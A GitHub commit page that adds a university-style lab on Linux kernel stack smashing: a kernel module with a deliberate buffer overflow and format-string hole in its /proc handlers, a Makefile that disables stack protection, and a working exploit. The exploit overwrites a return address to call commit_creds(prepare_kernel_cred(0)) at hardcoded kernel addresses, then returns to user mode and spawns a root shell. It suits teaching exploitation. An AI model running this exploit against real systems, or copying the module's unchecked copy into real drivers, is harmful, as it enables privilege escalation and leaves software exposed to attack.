added working exploit for lab 6

hkopp · Nov 19, 2018 · a6d3b2b · a6d3b2b
1 parent fd98450
commit a6d3b2b
Show file tree

Hide file tree

Showing 4 changed files with 147 additions and 0 deletions.
diff --git a/Lab6/README.md b/Lab6/README.md
@@ -0,0 +1 @@
+# Lab 6 - Stack Smashing
diff --git a/Lab6/exploit/exploit.c b/Lab6/exploit/exploit.c
@@ -0,0 +1,55 @@
+#include <stdlib.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <sys/stat.h>
+#include <string.h>
+#include <stdint.h>
+
+struct trap_frame{
+        void *rip;
+        uint64_t cs;
+        uint64_t rflags;
+        void *rsp;
+        uint64_t ss;
+};
+struct trap_frame tf;
+
+void launch_shell(){
+        getuid();
+        system("/bin/sh");
+}
+
+void prepare_tf(){
+        asm(    "movq %%cs, %0\n"
+                "movq %%ss, %1\n"
+                "movq %%rsp, %3\n"
+                "pushfq\n"
+                "popq %2\n"
+                : "=r"(tf.cs), "=r"(tf.ss), "=r"(tf.rflags), "=r"(tf.rsp) :: "memory"
+        ); 
+        tf.rip = &launch_shell;
+        tf.rsp -= 1024;
+}
+
+#define KERNCALL __attribute__((regparm(3)))
+void (*commit_creds)(void *) KERNCALL = (void*)0xffffffff81079680;
+void *(*prepare_kernel_cred)(void *) KERNCALL = (void *)0xffffffff810799b0;
+
+void payload(void){
+        commit_creds(prepare_kernel_cred(0));
+        asm(    "swapgs\n"
+                "mov $tf,%rsp\n"
+                "iretq\n"
+        );
+}
+
+int main(){
+        char buf[16]={0};
+        memset(buf,'A',16);
+        *(void **)(buf+8) = &payload;
+        prepare_tf();
+
+        int fd=open("/proc/smash",O_WRONLY);
+        write(fd,buf,sizeof(buf));
+}
+
diff --git a/Lab6/modules/Makefile b/Lab6/modules/Makefile
@@ -0,0 +1,17 @@
+ifneq (${KERNELRELEASE},)
+obj-m += smash.o
+
+else
+KERNEL_SOURCE := ../kernel_source/linux-4.18.16/
+ccflags-y := -fno-stack-protector -fno-stack-protector-all
+PWD := $(shell pwd)
+default:
+	# Compile for the same architecture as the host machine
+	$(MAKE) -C $(KERNEL_SOURCE) SUBDIRS=${PWD} modules
+arm:
+	# Cross compile for arm64/aarch64 architecture - Cross compiler needed !!!  
+	ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- $(MAKE) -C $(KERNEL_SOURCE) SUBDIRS=${PWD} modules
+clean:
+	# Cleans the Directory - removes all the files that were created
+	$(MAKE) -C $(KERNEL_SOURCE) SUBDIRS=${PWD} clean
+endif
diff --git a/Lab6/modules/smash.c b/Lab6/modules/smash.c
@@ -0,0 +1,74 @@
+/**
+ * smash.c - A module to demostrate stack smashing
+ *
+ */
+#include <linux/module.h>       /* Specifically, a module */
+#include <linux/kernel.h>       /* We're doing kernel work */
+#include <linux/proc_fs.h>      /* Necessary because we use the proc fs */
+#include <linux/uaccess.h>        /* for copy_from_user */
+
+#define PROCFS_MAX_SIZE         1024
+#define PROCFS_NAME             "smash"
+
+MODULE_LICENSE("GPL");
+
+static struct proc_dir_entry *Our_Proc_File;
+static char procfs_buffer[PROCFS_MAX_SIZE];
+static unsigned long procfs_buffer_size = 0;
+
+static
+ssize_t
+procfile_read(struct file *file,
+              char *buffer,
+              size_t buffer_length, loff_t *offset)
+{
+	static int flag = 0; 
+	if(flag) {
+	printk(KERN_INFO "read : END\n");
+		flag = 0;
+		return 0;
+	}
+	printk(KERN_INFO "read (/proc/%s) : called\n",PROCFS_NAME);
+	flag = 1;
+	return  sprintf(buffer, procfs_buffer);
+}
+
+static
+ssize_t procfile_write(struct file *file,const char *buffer, size_t count, loff_t *offset)
+{
+        char localbuf[8];
+        /* get buffer size */
+        procfs_buffer_size = count;
+        /* write data to the buffer */
+        if ( copy_from_user(procfs_buffer, buffer, procfs_buffer_size) ) {
+                return -EFAULT;
+        }
+        memcpy(localbuf,procfs_buffer,procfs_buffer_size);
+        printk(KERN_INFO "copied to buffer : %s", localbuf);
+        return procfs_buffer_size;
+}
+
+static struct file_operations fops_struct = {
+	.read = procfile_read,
+	.write = procfile_write,
+};
+
+int init_module()
+{
+        /* create the /proc file */
+        Our_Proc_File = proc_create(PROCFS_NAME, 0666, NULL, &fops_struct);
+        if (Our_Proc_File == NULL) {
+                remove_proc_entry(PROCFS_NAME, NULL);
+                printk(KERN_ALERT "Error: Could not initialize /proc/%s\n",
+                         PROCFS_NAME);
+                return -ENOMEM;
+        }
+        printk(KERN_INFO "/proc/%s created\n", PROCFS_NAME);
+        return 0;        /* everything is ok */
+}
+
+void cleanup_module()
+{
+        remove_proc_entry(PROCFS_NAME, NULL);
+        printk(KERN_INFO "/proc/%s removed\n", PROCFS_NAME);
+}